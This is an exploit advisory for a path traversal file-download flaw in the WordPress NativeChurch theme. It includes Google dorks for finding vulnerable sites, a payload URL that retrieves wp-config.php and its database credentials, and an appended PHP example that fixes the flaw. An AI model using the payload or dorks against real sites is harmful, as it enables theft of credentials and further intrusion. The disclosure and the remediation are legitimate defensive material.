WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download

2019.02.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

####################################################################

# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/02/2019
# Vendor Homepage : themeforest.net
# Software Information Link : themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
# Software Affected Versions : WordPress From 3.9 to 5.0.x
Compatible with Bootstrap 3.x - bbPress 2.5.x
From WooCommerce 2.1.x To WooCommerce 3.4.x,
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
inurl:''inurl:/wp-content/themes/NativeChurch/download/''
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : packetstormsecurity.com/files/151851/WordPress-NativeChurch-Multi-Purpose-5.0.x-File-Download.html

####################################################################

# Description about Software :
***************************
NativeChurch is a powerful WordPress Theme designed & developed for Church, Charity, Non-Profit and Religious Websites and comes in handy for Portfolio/Corporate Websites as well.

####################################################################

# Impact :
***********
* The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. Attackers can use a browser to exploit this issue.

* The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

####################################################################

# Arbitrary File Download Exploit :
******************************
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php

# Example Information about MySQL WordPress Configuration File :
***********************************************************
/** Name of the WordPress database. */
define('DB_NAME',

/** MySQL database user. */
define('DB_USER',

/** MySQL database password. */
define('DB_PASSWORD',

/** MySQL host address. */
define('DB_HOST',

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
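
The relative path traversal described under Impact is closed by canonicalising the requested path and confirming that it still lies inside the intended directory before any bytes are read. The PHP handler below is an added example, not the theme's own code; `DOWNLOAD_DIR`, the `files` subdirectory and `resolve_download()` are hypothetical names.

```php
<?php
// Added example. DOWNLOAD_DIR, the "files" subdirectory and resolve_download()
// are hypothetical names, not taken from the NativeChurch theme.
const DOWNLOAD_DIR = __DIR__ . '/files';

/**
 * Return the canonical path of $requested when it is a regular file inside
 * $baseDir, or null when it is missing or resolves outside that directory.
 */
function resolve_download(string $requested, string $baseDir): ?string
{
    // Empty input and NUL bytes are never valid file names.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "." and ".." segments and follows symlinks, so the
    // comparison below is made on the location that would actually be read.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base plus a trailing separator so that a sibling
    // such as "files-old" does not pass as being inside "files".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

$raw = $_GET['file'] ?? '';
$path = is_string($raw) ? resolve_download($raw, DOWNLOAD_DIR) : null;
if ($path === null) {
    // Same response for "missing" and "outside the directory".
    http_response_code(404);
    exit;
}
$name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

With this check a `file` value containing `..` segments resolves to a path that does not start with the download directory prefix, so the handler answers 404 instead of reading the file.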

References:

packetstormsecurity.com/files/151851/WordPress-NativeChurch-Multi-Purpose-5.0.x-File-Download.html

